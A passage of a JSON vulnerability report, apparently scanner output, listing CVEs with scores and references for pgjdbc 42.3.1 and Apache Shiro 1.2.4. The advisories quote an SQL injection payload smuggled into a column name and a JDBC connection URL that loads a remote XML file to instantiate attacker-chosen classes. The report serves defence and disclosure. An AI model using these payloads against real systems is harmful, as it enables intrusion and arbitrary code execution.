List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41946"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41946"},{"summary":"NetApp Advisory 
ntap-20240329-0003","url":"https://security.netapp.com/advisory/ntap-20240329-0003"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":4.7,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":4.7,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":4.7,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.8"]}],"title":"CVE-2022-41946/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-26520"]}],"cve":"CVE-2022-26520","discovery_date":"2022-03-11T00:02:02","ids":[{"system_name":"CVE Record","text":"CVE-2022-26520"},{"system_name":"GitHub Advisory","text":"GHSA-673j-qm5f-xpv8"},{"system_name":"Postgresql Advisory","text":"changelog"},{"system_name":"Debian Advisory","text":"dsa-5196"},{"system_name":"Postgresql Advisory","text":"tomcat"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Path traversal in org.postgresql:postgresql"},{"category":"details","details":"Vulnerability Details","text":"# Path traversal in org.postgresql:postgresql In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. 
NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties. ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-26520, CVE-2022-26520"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.1.0|<42.3.3"],"known_not_affected":["org.postgresql/postgresql@42.3.3"]},"references":[{"summary":"GitHub Advisory GHSA-673j-qm5f-xpv8","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8"},{"summary":"Postgresql Advisory changelog","url":"https://jdbc.postgresql.org/documentation/changelog.html#version_42.3.3"},{"summary":"Postgresql Advisory tomcat","url":"https://jdbc.postgresql.org/documentation/head/tomcat.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26520"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26520"},{"summary":"Debian Advisory dsa-5196","url":"https://www.debian.org/security/2022/dsa-5196"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":3.1,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.1,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":3.1,"temporalSeverity":"LOW","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.1.0|<42.3.3"]}],"title":"CVE-2022-26520/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/
CVE-2022-31197"]}],"cve":"CVE-2022-31197","cwe":{"id":"89","name":"Improper Neutralization of Special Elements used in an SQL Command"},"discovery_date":"2022-08-06T05:51:38","ids":[{"system_name":"CVE Record","text":"CVE-2022-31197"},{"system_name":"GitHub Advisory","text":"GHSA-r38f-c4h4-hqq2"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names"},{"category":"details","details":"Vulnerability Details","text":"# PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names ### Impact _What kind of vulnerability is it? Who is impacted?_ The PGJDBC implementation of the `java.sql.ResultRow.refreshRow()` method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. `;`, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user. User applications that do not invoke the `ResultSet.refreshRow()` method are not impacted. User application that do invoke that method are impacted if the underlying database that they are querying via their JDBC application may be under the control of an attacker. The attack requires the attacker to trick the user into executing SQL against a table name who's column names would contain the malicious SQL and subsequently invoke the `refreshRow()` method on the ResultSet. For example: ```sql CREATE TABLE refresh_row_example ( id int PRIMARY KEY, \"1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * \" int ); ``` This example has a table with two columns. The name of the second column is crafted to contain a statement terminator followed by additional SQL. Invoking the `ResultSet.refreshRow()` on a ResultSet that queried this table, e.g. `SELECT * FROM refresh_row`, would cause the additional SQL commands such as the `SELECT pg_sleep(10)` invocation to be executed. 
As the multi statement command would contain multiple results, it would not be possible for the attacker to get data directly out of this approach as the `ResultSet.refreshRow()` method would throw an exception. However, the attacker could execute any arbitrary SQL including inserting the data into another table that could then be read or any other DML / DDL statement. Note that the application's JDBC user and the schema owner need not be the same. A JDBC application that executes as a privileged user querying database schemas owned by potentially malicious less-privileged users would be vulnerable. In that situation it may be possible for the malicious user to craft a schema that causes the application to execute commands as the privileged user. ### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes, versions 42.2.26, 42.3.7, and 42.4.1 have been released with a fix. ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ Check that you are not using the `ResultSet.refreshRow()` method. If you are, ensure that the code that executes that method does not connect to a database that is controlled by an unauthenticated or malicious user. If your application only connects to its own database with a fixed schema with no DDL permissions, then you will not be affected by this vulnerability as it requires a maliciously crafted schema. 
## Related CVE(s) BIT-postgresql-jdbc-driver-2022-31197, CVE-2022-31197"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.7"],"known_not_affected":["org.postgresql/postgresql@42.3.7"]},"references":[{"summary":"GitHub Advisory GHSA-r38f-c4h4-hqq2","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00009.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-31197"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-31197"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.1,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.7"]}],"title":"CVE-2022-31197/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-21724"]}],"cve":"CVE-2022-21724"
,"cwe":{"id":"665","name":"Improper Initialization"},"discovery_date":"2022-02-02T00:04:20","ids":[{"system_name":"CVE Record","text":"CVE-2022-21724"},{"system_name":"GitHub Advisory","text":"GHSA-v7wg-cpwc-24m4"},{"system_name":"Debian Advisory","text":"dsa-5196"},{"system_name":"NetApp Advisory","text":"ntap-20220311-0005"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements in Output Used by a Downstream Component","title":"Additional CWE: 74"},{"category":"description","details":"Vulnerability Description","text":"pgjdbc Does Not Check Class Instantiation when providing Plugin Classes"},{"category":"details","details":"Vulnerability Details","text":"# pgjdbc Does Not Check Class Instantiation when providing Plugin Classes ### Impact pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. 
Here's an example attack using an out-of-the-box class from Spring Framework: ``` DriverManager.getConnection(\"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml\"); ``` The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property) ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-21724, CVE-2022-21724"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.2"],"known_not_affected":["org.postgresql/postgresql@42.3.2"]},"references":[{"summary":"GitHub Advisory GHSA-v7wg-cpwc-24m4","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21724"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21724"},{"summary":"NetApp Advisory ntap-20220311-0005","url":"https://security.netapp.com/advisory/ntap-20220311-0005"},{"summary":"Debian Advisory 
dsa-5196","url":"https://www.debian.org/security/2022/dsa-5196"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.0,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.0,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.0,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.2"]}],"title":"CVE-2022-21724/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1957"]}],"cve":"CVE-2020-1957","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:53:18","ids":[{"system_name":"CVE Record","text":"CVE-2020-1957"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Authentication in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authentication in Apache Shiro Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.5.2"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17f371fc89d34df2d0c8131473fbc68154290e1be238895648f5a1e6%40%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb3982edf8bc8fcaa7a308e25a12d294fb4aac1f1e9d4e14fda639e77@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc64fb2336683feff3580c3c3a8b28e80525077621089641f2f386b63@%3Ccommits.camel.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00014.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1957"},{"summary":"Cve 
2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1957"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.1"]}],"title":"CVE-2020-1957/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13933"]}],"cve":"CVE-2020-13933","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:54:23","ids":[{"system_name":"CVE Record","text":"CVE-2020-13933"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Authentication bypass in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Authentication bypass in Apache Shiro Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.3"],"known_not_affected":["org.apache.shiro/shiro-core@1.6.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r18b45d560d76c4260813c802771cc9678aa651fb8340e09366bfa198@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r4506cedc401d6b8de83787f8436aac83956e411d66848c84785db46d@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4c1e1249e9e1acb868db0c80728c13f448d07333da06a0f1603c0a33@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r539f87706094e79c5da0826030384373f0041068936912876856835f%40%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r575301804bfac87a064359cf4b4ae9d514f2d10db7d44120765f4129@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6ea0224c1971a91dc6ade1f22508119a9c3bd56cef656f0c44bbfabb@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70098e336d02047ce4d4e69293fe8d558cd68cde06f6430398959bc4@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70b907ccb306e9391145e2b10f56cc6914a245f91720a17a486c020a@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8097b81905f2a113ebdf925bcbc6d8c9d6863c807c9ee42e1e7c9293@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r852971e28f54cafa7d325bd7033115c67d613b112a2a1076817390ac@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9d93dfb5df016b1a71a808486bc8f9fbafebbdbc8533625f91253f1d@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ea6d8560d6354d41433ad006069904f0ed083527aa348b5999261a7@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb47d88af224e396ee34ffb88ee99fb6d04510de5722cf14b7137e6bc@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rb5edf49cd1451475dbcf53826ba6ef1bb7872dd6493d6112eb0c2bad@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re25b8317b00a50272a7252c4552cf1a81a97984cc2111ef7728e48e0@%3Cdev.shiro.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/08/msg00002.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13933"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13933"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.3"]}],"title":"CVE-2020-13933/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40664"]}],"cve":"CVE-2022-40664","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2022-10-12T12:00:16","ids":[{"system_name":"CVE Record","text":"CVE-2022-40664"},{"system_name":"Apache Advisory","text":"apache-shiro-1101-released"},{"system_name":"NetApp Advisory","text":"ntap-20221118-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro Authentication Bypass 
vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro Authentication Bypass vulnerability Apache Shiro before 1.10.0, Authentication Bypass Vulnerability in Shiro when forwarding or including via RequestDispatcher."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.10.0"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/12/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/12/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/13/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/loc2ktxng32xpy7lfwxto13k4lvnhjwg"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40664"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40664"},{"summary":"NetApp Advisory ntap-20221118-0005","url":"https://security.netapp.com/advisory/ntap-20221118-0005"},{"summary":"Apache 
Advisory","url":"https://shiro.apache.org/blog/2022/10/10/2022/apache-shiro-1101-released.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.1"]}],"title":"CVE-2022-40664/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-32532"]}],"cve":"CVE-2022-32532","cwe":{"id":"285","name":"Improper Authorization"},"discovery_date":"2022-06-30T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-32532"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Authorization","title":"Additional CWE: 863"},{"category":"description","details":"Vulnerability Description","text":"Improper Authorization in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authorization in Apache Shiro Apache Shiro before 1.9.1, A RegexRequestMatcher can be misconfigured to be bypassed on some servlet containers. 
Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.0"],"known_not_affected":["org.apache.shiro/shiro-core@1.9.1"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-32532"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-32532"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.0"]}],"title":"CVE-2022-32532/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11989"]}],"cve":"CVE-2020-11989","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:53:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-11989"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Authentication in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authentication in Apache Shiro Apache Shiro is a 
powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management. Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.2"],"known_not_affected":["org.apache.shiro/shiro-core@1.5.3"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r408fe60bc8fdfd7c74135249d646d7abadb807ebf90f6fd2b014df21@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675%40%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcf3d8041e1232201fe5d74fc612a193e435784d64002409b448b58fe@%3Cdev.geode.apache.org%3E"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11989"},{"summary":"CVE 
Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11989"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.2"]}],"title":"CVE-2020-11989/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-41303"]}],"cve":"CVE-2021-41303","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-09-20T20:18:11","ids":[{"system_name":"CVE Record","text":"CVE-2021-41303"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220609-0001"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro vulnerable to a specially crafted HTTP request causing an authentication bypass"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro vulnerable to a specially crafted HTTP request causing an authentication bypass Apache Shiro before 1.8.0, when using Apache Shiro with Spring Boot, a specially crafted HTTP request may cause an authentication bypass. 
